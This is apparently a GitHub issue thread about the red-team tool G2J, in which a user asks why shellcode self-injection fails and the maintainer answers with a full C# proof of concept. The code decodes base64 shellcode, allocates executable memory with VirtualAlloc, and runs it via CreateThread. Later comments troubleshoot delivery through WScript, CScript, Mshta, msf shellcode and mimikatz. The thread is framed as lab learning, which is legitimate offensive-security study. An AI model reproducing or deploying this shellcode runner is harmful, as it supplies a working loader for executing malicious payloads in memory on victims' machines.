Is it possible to inject shellcode into itself with G2J #12
Comments
|
Hi, Not sure which part is missing on your side, but the steps/Poc below worked for me;
using System;
using System.Runtime.InteropServices;
namespace CreateThread
{
public class Test
{
public Test()
{
ok();
}
public static void ok()
{
byte[] sh = Convert.FromBase64String("cat shellcode.bin | base64");
UInt32 addr = VirtualAlloc(0, (UInt32)sh.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(sh, 0, (IntPtr)(addr), sh.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr p = IntPtr.Zero;
hThread = CreateThread(0, 0, addr, p, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
|
|
How strange, unfortunatley I do not have CS to test it with but tested it with a whole range of shellcodes from msf and other popular C2's + simple shellcodes in net to write a message to desktop and nothing. They all work in the c# exe/dll without any problem just not with G2J. Sure I will spend the next few weekends banging my head against a wall only to find out it is something very simple! Thanks for the reply... fingers crossed I figure out what is wrong on my end :) |
|
Tested the same PoC above with MSF shellcode & it worked. Maybe the issue you're dealing with has to do with WScript/CScript or Mshta handler in use; #4 (comment). Or could be related to the build configuration you used for building G2JS (x86, x64) and .NET framework you (possibly) retargeted the project to. I hope this helps. |
|
Hi med0x2e, Thanks for all your help with this. For some strange reason nothing is working for me but now I know it does work, time for some more manual debugging. Probably will end up being something silly that has stopped it all along. Thanks again!!! :) |
Hi med0x2e,
Sorry, another question.
I have been playing around with g2j in a lab a lot (fantastic tool - thank you!). I have covered every single scenario but I cannot seem to get it to work if shellcode is injected into itself ie createthread / virtual alloc. I have been using shellcode such as msf to pop calc or dump hashes. I also played aorund with adding sleep in case the process was ending to quickly but nothing. Having seen that mimikatz can be embedded into g2j, I cannot see why it would not work but I am stumped. Should it be possible? and if not, would you mind explaining why? (sorry, still a newbie so still learning a lot in labs and vms).
Thanks a million
The text was updated successfully, but these errors were encountered: